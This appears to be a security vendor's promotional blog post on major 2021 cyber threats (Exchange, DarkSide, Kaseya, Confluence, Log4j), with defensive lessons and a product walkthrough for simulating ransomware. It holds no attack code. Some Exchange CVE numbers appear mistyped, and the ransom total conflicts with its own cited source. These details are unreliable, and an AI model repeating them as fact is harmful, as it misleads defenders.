10 Lessons Learned from the Top Cyber Threats of 2021

The Blue Report 2024

Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.

DOWNLOAD

2021 was a busy year for the cyber security community. Emerging threats posed many challenges to security professionals and created many opportunities for threat actors. Picus has curated a list of the top five threats observed in 2021, detailing ten lessons defenders can learn from them. 

Microsoft Exchange Server Vulnerabilities

In January 2021, Volexity detected a large amount of egress data traffic on its customers’ Microsoft Exchange Servers [1]. Later, it discovered that several vulnerabilities had been exploited for unauthorized data exfiltration by an APT group called HAFNIUM. In March 2021, Microsoft released several updates to patch zero day vulnerabilities found in Microsoft Exchange Server affecting versions 2010, 2013, 2016 and 2019 [2]. Details of the vulnerabilities are provided below:

CVE Number

Vulnerability Type

CVSS Score

CVE-2021-26885

Remote Code Execution

9.8 (Critical)

CVE-2021-26887

Remote Code Execution

7.8 (High)

CVE-2021-26888

Remote Code Execution

7.8 (High)

CVE-2021-27065

Remote Code Execution

7.8 (High)

 

Exploitation of these vulnerabilities affected 250,000 servers around the world [3].

As Picus, we published a detailed blog post about the Tactics, Techniques, and Procedures (TTPs) used by HAFNIUM to target Microsoft Exchange Servers.

Lessons learned:

1. Continuously check your network traffic for anomalies

Vendors’ response times to vulnerabilities can be longer than expected. Although exploitation of vulnerabilities was first reported in January, Microsoft released patches in March. If organizations were to wait for a patch, they would be vulnerable to exploitation for nearly 2 months. Therefore, network traffic should be monitored all times and analysed for unusual activity.

2. Perform threat hunting after patching

In the case of the Microsoft Exchange Server vulnerabilities listed above, patches were effective to remediate the vulnerabilities and block new exploitation attempts. However, threat actors still had unauthorized access to servers that were exploited before patching. Therefore, it is important to perform threat hunting activities and assume that vulnerabilities might be exploited before patching. Check for leftover artifacts of the threat actors and make sure to remove any malicious files from your network.

DarkSide Ransomware Campaign

The DarkSide ransomware group provided Ransomware as a Service (RaaS) to other threat actors. According to Elliptic, this campaign extorted over 80 million USD in 2021 [4]. Most notably, US-based Colonial Pipeline Company paid 4.4 million USD after its operations were brought to a halt by this ransomware campaign in May 2021. After the ransom was paid, the pipeline slowly regained its operational capabilities.

We published a whitepaper about Tactics, Techniques, and Procedures (TTPs) and also tools utilized by the DarkSide threat actors. 

Lessons Learned:

3. Practice risk management for the worst case event

When ransomware threat actors infect a critical infrastructure, they hold hostage both the company and its customers. When Colonial Pipeline Company was hit by ransomware, fuel shortages occurred across the US and some airports could not provide fuel to airlines. This was one of the worst case scenarios for the company and society. Practicing risk management for assets is important to estimate and understand possible outcomes in the event of a cyber attack. 

4.  Implement behaviour-based detection 

Ransomware is evolving and mostly uses legitimate tools that are already whitelisted by organizations. Therefore, signature-based detection falls short against them. Behavior-based detection and proactive approaches such as attack simulation and security control validation becomes more important each day.

This lesson is also a key recommendation from Picus Labs to help detect and respond to the techniques identified in the Red Report 2021.

See Picus in Action

Watch how you can easily simulate DarkSide ransomware to assess your security posture and prevent them with signatures of your WAF, IPS, and NGFW. 

13 STEPS

1. Let's look at DarkSide ransomware attacks in the Picus Threat Library. To see the Threat Library, click on Threats.

Step 1 image

2. Picus Threat Library includes five main threat categories. Ransomware is classified under Malicious Code category. Click on Ransomware to list ransomware attacks in the library.

Step 2 image

3. The latest ransomware simulations are listed here. To search for DarkSide ransomware, click to the search bar.


Step 3 image

4. To search by name of any ransomware, type name in the search bar and press enter.

Step 4 image

5. Click on Name from the drop down menu

Step 5 image

6. Type Darkside in the search bar and press enter.

Step 6 image

7. Click highlighted icon to run the search in the Picus Threat Library.

Step 7 image

8. Picus Threat Library includes multiple Darkside variants. Let's look into Variant-10 by clicking on it. It will open threat detail for the selected ransomware.

Step 8 image

9. Under Overview tab, File details is available. Let's click Assess to go to assessment screen.

Step 9 image

10. Under Assess tab, you can run ransomware simulation any time you want. Click on Assess to run simulation for DarkSide ransomware Variant-10.

Step 10 image

11. Assessment is finished and the result is "Blocked" as indicated by the green icon. If the result was not blocked, don't worry. Picus also provides prevention signatures of security vendors. Let's click Prevention tab to see these signatures.

Step 11 image

12. Vendors signatures for IPS, WAF and NGFW to prevent the simulated attack can be found under Prevention tab.

Step 12 image

13. With few click, we quickly simulated DarkSide Ransomware attacks and obtained prevention signatures.

Request your free Picus demo to test your security controls against ransomware attacks now!

Step 13 image

Here's an interactive tutorial

** Best experienced in Full Screen (click the icon in the top right corner before you begin) **

https://www.iorad.com/player/1898700/Darkside-Ransomware-Tutorial-w--audio

 

Kaseya MSP Supply Chain Attack

In July 2021, REvil ransomware group (also known as Sodinokibi) launched an attack campaign against Managed Service Providers (MSPs) and thousands of their customers. Like the Solarwinds attack in 2020, Kaseya MSP attack was a supply chain attack and delivered using Kaseya VSA Agent Hot-fix. According to Reuters, the attack affected between 800 and 1500 businesses around the world [5]. REvil demanded 70 million USD for a universal decryptor, however, the website of the ransomware group disappeared some time later. Due to the size of the attack, the amount of ransom collected is unknown. Kaseya later released a universal decryptor for the victims.

Click here to learn more about Tactics, Techniques, and Procedures (TTPs) Used by REvil in theKaseya MSP Supply-Chain Attack.

Lessons Learned:

5. Adopt a zero trust strategy

It is near impossible to defend your assets against zero-day vulnerabilities in widely used services. However,  by adopting zero trust architecture in your network, which limits the access of threat actors to network assets, it’s possible to significantly minimize the effects of attacks as well as any damages which may occur. 

6. Monitor use of built-in operating system utilities

Adversaries prefer to abuse built-in tools in their attack campaigns. For example, REvil used numerous living off the land (LOL) utilities, such as PowerShell, certutil.exe, and MsMpEng.exe, to conduct the Kaseya attack campaign.

The increased prevalence of this type of adversary behavior is also a key finding of the Red Report 2021. According to the report, attackers predominantly use built-in legitimate utilities to perform all the top 10 techniques, revealing adversaries' preference for abusing legitimate tools rather than custom ones.

You need to monitor the use of the known living off the land binaries and scripts (LOLBAS), to identify their malicious use [6]. 

Atlassian Confluence Remote Code Execution Vulnerability

In August 2021, a remote code execution vulnerability was disclosed by Atlassian with a CVSS score of 9.8 (critical). This vulnerability affected Atlassian Confluence Server and Confluence Data Center versions prior to 6.13.23, 7.4.11,  7.11.6,  7.12.5 and 7.13.0.  US CERT and CISA warned about mass exploitation of the vulnerability urging organizations to apply necessary updates [7]. It was mostly exploited by crypto-mining malware.

Lessons Learned:

7. Maintain strict supervision of  your public-facing applications

Public-facing applications are a great place to gain initial access to any network and threat actors often utilize vulnerabilities in these services. When a critical vulnerability is found in a public-facing service, it is often used as an entry point of mass exploitation and lateral movement. The traffic received by these services should be kept in check and security controls such as NGFW and WAF should be properly set up and validated.

8. Test the effectiveness of your security controls

Investing in security control devices does not provide complete assurance that your important assets are secure. Policy weaknesses and misconfigurations can create gaps for attackers to exploit so ensure that you regularly test your controls to ensure that they are deployed correctly and tuned to defend against the latest threats.. After applying a patch or applying a configuration change, test that affected devices are working as intended. 

Apache Log4j Vulnerabilities

In December 2021, four vulnerabilities were disclosed in the Apache Log4j library. Details of vulnerabilities are given below:

CVE Number

Vulnerability Type

CVSS Score

CVE-2021-44228

Remote Code Execution

10.0 (Critical)

CVE-2021-45046

Remote Code Execution

9.0 (Critical)

CVE-2021-45105

Denial of Service

7.5 (High)

CVE-2021-44832

Remote Code Execution

6.6 (Medium)

This library is downloaded millions of times and the number of applications that use the Log4j library is unknown. According to Microsoft Threat Intelligence Center (MSTIC), multiple APT groups are exploiting Log4j vulnerabilities [8].

Lessons Learned:

9. Improve visibility of your software inventory

It is hard to pinpoint assets with vulnerable Log4j libraries. Even if your organization does not use Log4j in any of its assets, any 3rd party services may have used it and not disclosed this information. Improve supply chain transparency and keep track of 3rd party assets and their components.

10. Better utilize security controls

Due to wide-spread use of Log4j, vulnerable assets can be anywhere and patching them might be out of your hands, especially for 3rd party assets. While waiting for other vendors to patch their vulnerable assets, validate your security controls and test your security posture.

Check out this video, where we explain the four key steps to reduce your risk and explain how the Picus platform can help you to optimize your security controls to prevent exploitation against Log4j.

Validate Your Security Controls Against Top Threats of 2021

References

[1] “Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities.” [Online]. Available: https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/.

[2] MSRC Team, “On-Premises Exchange Server Vulnerabilities Resource Center – updated March 25, 2021.” [Online]. Available: https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/.

[3] H. Murphy, “Microsoft hack escalates as criminal groups rush to exploit flaws,” Financial Times, 09-Mar-2021. [Online]. Available: https://www.ft.com/content/74fa3de6-dd16-4dc5-9b69-38bde634adc3

[4] T. Robinson, “DarkSide Ransomware has Netted Over $90 million in Bitcoin.” [Online]. Available: https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin.

[5] R. Satter, “Up to 1,500 businesses affected by ransomware attack, U.S. firm’s CEO says,” Reuters, 05-Jul-2021. [Online]. Available: https://www.reuters.com/technology/hackers-demand-70-million-liberate-data-held-by-companies-hit-mass-cyberattack-2021-07-05/.

[6] “LOLBAS.” [Online]. Available: https://lolbas-project.github.io

[7] “Atlassian Releases Security Updates for Confluence Server and Data Center.” [Online]. Available: https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data.

[8] Microsoft 365 Defender Threat Intelligence Team and Microsoft Threat Intelligence Center (MSTIC), “Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability,” 12-Dec-2021. [Online]. Available: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/